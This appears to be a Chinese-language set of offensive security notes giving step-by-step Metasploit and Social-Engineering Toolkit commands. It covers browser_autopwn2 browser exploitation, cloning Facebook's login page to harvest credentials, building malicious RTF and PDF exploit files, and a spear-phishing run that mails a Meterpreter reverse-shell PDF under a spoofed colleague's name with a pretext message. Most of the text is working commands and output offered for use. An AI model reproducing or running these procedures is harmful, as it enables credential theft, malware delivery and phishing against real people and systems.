浏览器攻击
browser_autpwn2 (BAP2)
mkdir /test 为接受响应的服务器创建目录
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.56.1
set URIPATH /test
#假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
set EXCLUDE_PATTERN android|adobe_flash
show advanced 查看高级选项的完整列表
set ShowExploitList true
set VERBOSE true
exploit
使目标浏览器访问http://192.168.56.1/test
窃取浏览器登录凭证
root@bt:# service apache2 start
root@bt:# setoolkit
Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner
IP address for the POST back in Harvester/Tabnabbing: 填写本机IP
set:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面)
此时会在/var/www/中生成3个文件,保存在html文件夹中,此时访问本机ip时,则会出现相同登录页面,若目标登录,会把密码储存在生成的harvester文件中
Office
ms10_087漏洞,执行自定义的exe文件
msf > db_status postgresql selected, no connection msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf > search office msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe msf exploit(ms10_087_rtf_pfragments_bof) > exploit [+] msf.rtf stored at /root/.msf4/local/msf.rtf
root@kali:~# cd /root/.msf4/local 生成的msf.rtf
/*************************************************************************/
use exploit/windows/fileformat/adobe_utilprintf
(Adobe Reader版本应低于8.1.2) set FILENAME malicious.pdf set PAYLOAD windows/exec set CMD calc.exe show options exploit
从PDF中分析和提取payload可以使用 PDF Stream Dumper 工具
恶意PDF分析可以参考:
https://zeltser.com/analyzing-malicious-documents/
https://zeltser.com/peepdf-malicious-pdf-analysis/
MailAttack
set> 1 Social-Engineering Attacks set> 1 Spear-Phishing Attack Vectors set:phishing>1 Perform a Mass Email Attack set:payloads>6 Adobe CoolType SING Table "uniqueName" Overflow set:payloads>2 Windows Meterpreter Reverse_TCP set:payloads> Port to connect back on [443]: All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory Do you want to rename the file? example Enter the new filename: moo.pdf 1. Keep the filename, I don't care. 2. Rename the file, I want to be cool. = ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E
然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。
把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上(关闭防病毒软件),打开template.pdf,修改后拷贝回原目录下,覆盖原有的template.pdf
set:phishing>2 set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf set:phishing>1 E-Mail Attack Single Email Address set:phishing>2 One-Time Use Email Template set:phishing> Subject of the email:ABC Project Status set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished: Next line of the body: Hi Wang: Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice. Next line of the body: Next line of the body: Best Regard! Next line of the body: li Ming Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.com set:phishing>2 Use your own server or open relay set:phishing> From address (ex: moo@example.com):liming@dvssc.com set:phishing> Username for open-relay [blank]:yourname Password for open-relay [blank]: set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com set:phishing> Port number for the SMTP server [25]: set:phishing> Flag this message/s as high priority? [yes|no]:yes [*] SET has finished delivering the emails set:phishing> Setup a listener [yes|no]:yes